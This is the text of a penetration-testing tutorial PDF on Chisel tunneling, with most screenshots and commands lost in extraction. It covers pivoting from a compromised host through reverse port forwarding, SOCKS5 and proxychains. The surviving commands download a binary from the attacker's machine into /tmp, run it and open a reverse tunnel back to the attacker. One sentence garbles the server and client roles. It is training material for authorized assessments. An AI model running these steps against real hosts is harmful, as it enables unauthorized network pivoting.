Chisel
Chisel
Chisel
Contents
Background of Port forwarding: ..................................................... 3
Introduction to Chisel..................................................................... 3
Establish a connection with the remote host .................................. 3
Installation .................................................................................... 4
Local port forwarding Example - 1 .................................................. 5
Local Port forwarding Example - 2 .................................................. 7
Establish Connection with SOCKS5 Proxy ........................................ 9
Configure SOCKS5 in proxychains4.conf file .................................. 12
Banner grabbing of the remote host with proxychains .................. 13
Telnet Connection using proxychains ........................................... 13
FTP connection using proxychains ................................................ 14
VNC Viewer connection using proxychains ................................... 15
Conclusion: .................................................................................. 17
Page 2 of 17
A Detailed Guide on Chisel
Introduction to Chisel
Chisel is open-sourced tool written in Go (Golang) language, mainly useful for passing through
firewalls, though it can also be used to provide a secure endpoint into your network. It is a fast
TCP/UDP tunnel, transported over HTTP and secured via SSH. In addition, it requires two things to
establish a connection between a remote host and the attacking box, where the attacking box will act
as the server and the remote host as a client.
ssh [email protected]
netstat -antp
Page 3 of 17
Installation
Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can
install it using the below command.
Page 4 of 17
Local port forwarding Example - 1
In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here
we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the
first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.
Once our Chisel server is ready and reverse tunneling is enabled, we will be required to transfer a
chisel binary to the remote host. The chisel binaries can be downloaded from the official repository
based on the system architecture. All the latest available binaries can be found by accessing the
releases tab. As we will test it on a Linux system with AMD64 architecture, we selected the highlighted
one.
Page 5 of 17
After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will
unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target
system to set up a chisel as a client. To transfer the file, we set up a python server in our local system,
which will host our file on port 80.
We downloaded the chisel binary in the remote host's /tmp directory, where everyone has full
permission on files. Then we give full permission to file so we can execute it. Suppose we do not give
appropriate permission to file. In that case, we cannot execute it as it is set only to read permission
when we download anything in the temp directory as a low-privileged user. To establish a remote
connection, we require a chisel server and a chisel client where the chisel server is the Attacking box,
and the chisel server will be the target machine. As we have already set up a chisel server on port
5000 earlier, we are establishing a connection with the server. In this example, we mentioned chisel
as a client and gave the server IP address and port number (5000). We then mentioned an accessing
port (4444) and localhost with a port where HTTP service is hosted internally in the remote system.
1. wget 192.168.1.205/chisel_1.7.7_linux_amd64
2. chmod 777 chisel_1.7.7_linux_amd64
3. ./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
Page 6 of 17
Local Port forwarding Example - 2
There is another way to access the HTTP service using the attacker's IP address instead of the loopback
interface this time. We will be required to install a chisel in the target machine to achieve the goal. In
this example, we are using the ubuntu system. As the chisel is written in Golang language, we need to
install Golang in the target system using the below command.
Next, we download a chisel from its official repository to install it in the target system. Go build is an
automatic build tool that aims to replace Make files for simple projects written in the Go programming
language. It creates a dependency graph of all local imports and compiles them in the correct order
using the GC Go compiler. The ldflags stands for linker flags and is used to pass in flags to the
underlying linker in the Go toolchain. The -s and -w linker flags are not strictly needed, but they
decrease the size of the resulting binary. By navigating the download folder of the chisel, we simply
installed it with the help of go build.
Page 7 of 17
Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last
example, we accessed it from the attacking box loopback interface, connecting to the service hosted
in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker
side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205)
and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback
(127.0.0.1) on remote port 8888.
When a connection is established with the chisel server, we can access the HTTP service from the
attacking box on port 8888.
Page 8 of 17
Establish Connection with SOCKS5 Proxy
During the internal assessment, we may come across when we compromise a system, and that system
is communicating with another system using a different adaptor or a different subnet. It can be
checked using ipconfig/ifconfig, where we can view if that system is connected to a different network
via a different adapter. In such scenarios, local port forwarding will not work, and we have to identify
which ports are open for the outbound traffic. As shown in the screenshot below, we could not
establish a connection with the remote host.
To overcome this issue, we have to go through multiple steps. First, we set up a chisel server in the
attacking box on port 8000.
Then we establish a connection with the chisel server from the ubuntu box mentioning remote access
on socks proxy. Just like most other proxy types, SOCKS proxies hide the client's IP address and serve
when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are
mainly used to facilitate communication with websites with firewalls and limit regular client access.
All communication can be done on SOCKS5 proxy using utilities such as proxychains or proxychain4.
Page 9 of 17
-p: listening port of the server (attacking box)
We can also access an individual target's port using the command below. We connect with the
server hosted in the Attacking machine and then access the target service via a tunnel.
Also, we can specify socks proxy while setting up the chisel server. In the below example, we have
set up a chisel server on port 9001 using the socks5 proxy.
All the above setup is done at the system level, but how will the browser know we want to access
HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or
H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS
and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5,
which depend on the version we are using. In this example, we are using SOCKS5 and port number
1080. And no proxy for the loopback interface. It can also be done using the foxyproxy addon available
in Mozilla Firefox.
Page 10 of 17
Now we can access the services without any issues. We can verify accessing the target HTTP service
where the request will send via a proxy.
Page 11 of 17
Configure SOCKS5 in proxychains4.conf file
If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file
using any text editor. The configuration file is located in the /etc as proxychains4.conf.
To edit the configuration file, we need to comment socks4 proxy if that is configured by default and
add socks5 on the loopback interface with the port number. We can use any port, but in this example,
we use port 1080.
Page 12 of 17
Banner grabbing of the remote host with proxychains
Let's grab the banner of ports 21, 23, and 5900. Port 21 belongs to the File transfer protocol, 23 to
the telnet, and 5900 to the VNC server. FTP transfers files from different sources to different
destinations, and the telnet is used for the remote connection in the command line interface. On the
other hand, VNC can be used to establish a GUI-based remote connection. To grab the banners or
access the remote host, we have to use proxychains before using any command so the request will
be made from the tunnel that we created. From the output, it is confirmed that all three ports are
open. In our command, we have used -zvn options that stand for:
-z Specifies that nc should only scan for listening daemons without sending any data to them.
Page 13 of 17
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over
Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is
considered an application layer protocol. Let's connect with the same credentials we used in telnet.
We connected to ftp successfully, and with ls command, we can list the available file in the directory.
Page 14 of 17
VNC Viewer connection using proxychains
In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and
mobile devices you want to control from. A device such as a computer, tablet, or smartphone with
installed VNC Viewer software can access and control a computer in another location. This service
runs in its default port, 5900. To establish a connection with VNC, we can use proxychains using the
vncviewer utility and the remote IP address, and we will receive a GUI-based interface.
Page 15 of 17
Page 16 of 17
Conclusion:
We have explored chisel briefly, which will make our Internal assessment much easier, especially
when we come across port forwarding. We have explored multiple techniques to establish a remote
session using a chisel with and without socks5 proxy. Also, we have explored proxychains role in a
tunneled connection. I hope you have learned something new today. Happy hacking!
Page 17 of 17